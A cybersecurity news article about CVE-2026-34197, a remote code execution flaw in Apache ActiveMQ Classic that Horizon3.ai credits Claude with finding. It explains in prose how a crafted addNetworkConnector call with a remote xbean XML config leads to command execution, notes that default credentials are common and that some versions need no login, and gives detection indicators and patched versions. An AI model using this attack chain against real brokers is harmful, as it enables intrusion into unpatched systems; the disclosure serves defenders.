A critical remote code execution (RCE) vulnerability has been disclosed in Apache ActiveMQ Classic, a flaw that sat undetected for over a decade and was ultimately discovered not by a human researcher manually combing through code, but by Anthropic’s Claude AI model in under 10 minutes.
Tracked as CVE-2026-34197, the flaw is an improper input validation and code injection vulnerability residing in Apache ActiveMQ Classic’s Jolokia JMX-HTTP bridge, exposed via the web console at /api/jolokia/ on port 8161.
The vulnerability allows an authenticated attacker to call the addNetworkConnector(String) management operation on the broker’s MBean and supply a crafted VM transport URI containing an attacker-controlled brokerConfig=xbean:http:// parameter.
When processed, ActiveMQ’s VM transport layer creates an on-the-fly embedded broker by calling BrokerFactory.createBroker() using the attacker-supplied URL.
Apache ActiveMQ RCE Vulnerability
The xbean: scheme then hands the URL to Spring’s ResourceXmlApplicationContext, which instantiates all bean definitions in the remote XML file — allowing arbitrary OS command execution via Spring’s MethodInvokingFactoryBean to invoke Runtime.getRuntime().exec().
The root cause traces back to a remediation for CVE-2022-41678, where Apache added a blanket Jolokia allow rule for all operations on ActiveMQ’s own MBeans (org.apache.activemq:*) to preserve web console functionality. That decision inadvertently unlocked every management operation — including addNetworkConnector — as an attack surface through Jolokia’s REST API.
While CVE-2026-34197 requires valid credentials in most deployments, default credentials (admin:admin) are widely present across enterprise environments.
Apache ActiveMQ RCE Vulnerability (Source: Horizon3)
More critically, organizations running ActiveMQ versions 6.0.0 through 6.1.1 are exposed to a fully unauthenticated RCE path. A separate flaw, CVE-2024-32114, inadvertently stripped authentication constraints from the /api/* path in those versions, meaning the Jolokia endpoint requires zero credentials — making CVE-2026-34197 a no-auth RCE on those builds.
ActiveMQ has a well-documented history of being targeted in the wild. Both CVE-2016-3088 (authenticated RCE via the web console) and CVE-2023-46604 (unauthenticated RCE via the broker port) are listed on CISA’s Known Exploited Vulnerabilities (KEV) catalog.
Researchers at Horizon3.ai credited Anthropic’s Claude AI with identifying the flaw during an AI-assisted source code review. By providing Claude with a lightweight vulnerability-hunting prompt and a live target for validation, the team enabled the AI to trace the multi-component attack chain spanning Jolokia, JMX, network connectors, and VM transports in approximately 10 minutes.
Analysts noted this chain would likely have taken a skilled human researcher an entire week to map manually, underscoring how AI models are fundamentally lowering the barrier for vulnerability research.
Mitigations
Organizations should monitor ActiveMQ broker logs for entries referencing vm:// URIs containing brokerConfig=xbean:http, POST requests to /api/jolokia/ with addNetworkConnector in the body, and unexpected outbound HTTP connections from the ActiveMQ process. Defenders should also watch for unusual child processes spawned by the ActiveMQ JVM.
The vulnerability is patched in ActiveMQ Classic versions 5.19.4 and 6.2.3. The fix removes the ability for addNetworkConnector to register vm:// transports via the Jolokia API entirely.
All organizations running affected versions should update immediately and audit deployments for default credential usage across all ActiveMQ instances.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Claude Uncovers 13-Year-Old RCE Flaw in Apache ActiveMQ in Just 10 Minutes appeared first on Cyber Security News.
